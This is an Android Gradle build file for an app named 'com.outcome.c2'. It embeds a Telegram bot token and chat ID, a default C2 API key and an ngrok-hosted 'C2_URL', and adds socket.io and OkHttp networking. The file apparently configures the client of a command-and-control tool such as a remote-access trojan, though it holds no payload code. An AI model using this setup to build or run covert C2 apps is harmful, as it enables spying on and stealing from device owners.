plugins {
    id 'com.android.application'
    id 'org.jetbrains.kotlin.android'
}

android {
    namespace 'com.outcome.c2'
    compileSdk 34

    defaultConfig {
        applicationId "com.outcome.c2"
        minSdk 24
        targetSdk 34
        versionCode 1
        versionName "1.0"

        def tgToken = System.getenv("TG_BOT_TOKEN") ?: "TG_TOKEN_NOT_SET"
        def tgChat  = System.getenv("TG_CHAT_ID")   ?: "TG_CHAT_NOT_SET"
        def c2Key   = System.getenv("C2_API_KEY")   ?: "bukamal"
        def c2Url   = System.getenv("C2_URL")       ?: "https://backdrop-embassy-anymore.ngrok-free.dev"

        buildConfigField "String", "TG_BOT_TOKEN", "\"${tgToken}\""
        buildConfigField "String", "TG_CHAT_ID",   "\"${tgChat}\""
        buildConfigField "String", "API_KEY",      "\"${c2Key}\""
        buildConfigField "String", "C2_URL",       "\"${c2Url}\""
    }

    buildFeatures { buildConfig true }

    compileOptions {
        sourceCompatibility JavaVersion.VERSION_17
        targetCompatibility JavaVersion.VERSION_17
    }
    kotlinOptions { jvmTarget = '17' }

    packagingOptions {
        resources.excludes += "/META-INF/{AL2.0,LGPL2.1}"
    }
}

dependencies {
    implementation 'androidx.core:core-ktx:1.12.0'
    implementation 'org.jetbrains.kotlinx:kotlinx-coroutines-android:1.7.3'
    implementation 'com.squareup.okhttp3:okhttp:4.12.0'
    implementation ('io.socket:socket.io-client:2.1.1') {
        exclude group: 'org.json', module: 'json'
    }
}
